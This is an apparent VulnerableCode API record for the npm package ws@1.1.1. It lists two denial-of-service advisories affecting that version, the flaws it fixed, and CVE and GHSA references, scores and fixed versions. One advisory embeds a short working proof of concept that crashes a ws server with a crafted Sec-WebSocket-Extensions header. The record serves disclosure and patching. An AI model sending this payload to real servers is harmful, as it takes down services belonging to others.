Package Instance
Look up vulnerable packages by Package URL.
GET /api/packages/51723?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/51723?format=api", "purl": "pkg:npm/ws@1.1.1", "type": "npm", "namespace": "", "name": "ws", "version": "1.1.1", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "1.1.5", "latest_non_vulnerable_version": "8.20.1", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/11892?format=api", "vulnerability_id": "VCID-4851-mkc2-pqdw", "summary": "Denial of Service\nA specially crafted value of the `Sec-WebSocket-Extensions` header that uses `Object.prototype` property names as extension or parameter names can be used to make a `ws` server crash.", "references": [ { "reference_url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a" }, { "reference_url": "https://github.com/websockets/ws/releases/tag/3.3.1", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/releases/tag/3.3.1" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/53597?format=api", "purl": "pkg:npm/ws@3.3.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1" } ], "aliases": [ "GMS-2017-331" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4851-mkc2-pqdw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/13656?format=api", "vulnerability_id": "VCID-4u5m-kp7t-x3cf", "summary": "Denial of Service in ws\nAffected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.\n\n## Proof of concept\n\n```\nconst WebSocket = 
require('ws');\nconst net = require('net');\n\nconst wss = new WebSocket.Server({ port: 3000 }, function () {\n const payload = 'constructor'; // or ',;constructor'\n\n const request = [\n 'GET / HTTP/1.1',\n 'Connection: Upgrade',\n 'Sec-WebSocket-Key: test',\n 'Sec-WebSocket-Version: 8',\n `Sec-WebSocket-Extensions: ${payload}`,\n 'Upgrade: websocket',\n '\\r'\n ].join('\\r');\n\n const socket = net.connect(3000, function () {\n socket.resume();\n socket.write(request);\n });\n});\n```\n\n\n## Recommendation\n\nUpdate to version 3.3.1 or later.", "references": [ { "reference_url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a" }, { "reference_url": "https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407" }, { "reference_url": "https://nodesecurity.io/advisories/550", "reference_id": "", "reference_type": "", "scores": [], "url": "https://nodesecurity.io/advisories/550" }, { "reference_url": "https://snyk.io/vuln/npm:ws:20171108", "reference_id": "", "reference_type": "", "scores": [], "url": "https://snyk.io/vuln/npm:ws:20171108" }, { "reference_url": "https://www.npmjs.com/advisories/550", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.npmjs.com/advisories/550" }, { "reference_url": "https://www.npmjs.com/advisories/550/versions", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.npmjs.com/advisories/550/versions" }, { "reference_url": "https://github.com/advisories/GHSA-5v72-xg48-5rpm", "reference_id": "GHSA-5v72-xg48-5rpm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": 
"https://github.com/advisories/GHSA-5v72-xg48-5rpm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/57135?format=api", "purl": "pkg:npm/ws@1.1.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/53597?format=api", "purl": "pkg:npm/ws@3.3.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1" } ], "aliases": [ "GHSA-5v72-xg48-5rpm", "GMS-2019-145" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4u5m-kp7t-x3cf" } ], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/13362?format=api", "vulnerability_id": "VCID-37mw-j411-a3az", "summary": "Improper Input Validation\nws is a \"simple to use, blazing fast and thoroughly tested websocket client, server and console for node.js, up-to-date against RFC-6455\". By sending an overly long websocket payload to a `ws` server, it is possible to crash the node process. 
This affects ws 1.1.0 and earlier.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2016-10542", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.66075", "scoring_system": "epss", "scoring_elements": "0.98537", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2016-10542" }, { "reference_url": "https://github.com/nodejs/node/issues/7388", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/nodejs/node/issues/7388" }, { "reference_url": "https://nodesecurity.io/advisories/120", "reference_id": "", "reference_type": "", "scores": [], "url": "https://nodesecurity.io/advisories/120" }, { "reference_url": "https://www.npmjs.com/advisories/120", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.npmjs.com/advisories/120" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10542", "reference_id": "CVE-2016-10542", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10542" }, { "reference_url": "https://github.com/advisories/GHSA-6663-c963-2gqg", "reference_id": "GHSA-6663-c963-2gqg", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6663-c963-2gqg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/51723?format=api", "purl": "pkg:npm/ws@1.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4851-mkc2-pqdw" }, { "vulnerability": "VCID-4u5m-kp7t-x3cf" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.1" } ], "aliases": [ "CVE-2016-10542", "GHSA-6663-c963-2gqg" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-37mw-j411-a3az" }, { "url": 
"http://public2.vulnerablecode.io/api/vulnerabilities/10958?format=api", "vulnerability_id": "VCID-hedn-18sd-bba2", "summary": "DoS due to excessively large websocket message\nIt is possible to crash the node process by sending an overly long websocket payload to a ws server.", "references": [ { "reference_url": "https://github.com/nodejs/node/issues/7388", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/nodejs/node/issues/7388" }, { "reference_url": "https://github.com/websockets/ws/commit/0328a8f49f004f98d2913016214e93b2fc2713bc", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/commit/0328a8f49f004f98d2913016214e93b2fc2713bc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/51723?format=api", "purl": "pkg:npm/ws@1.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4851-mkc2-pqdw" }, { "vulnerability": "VCID-4u5m-kp7t-x3cf" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.1" } ], "aliases": [ "GMS-2016-38" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hedn-18sd-bba2" } ], "risk_score": "4.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.1" }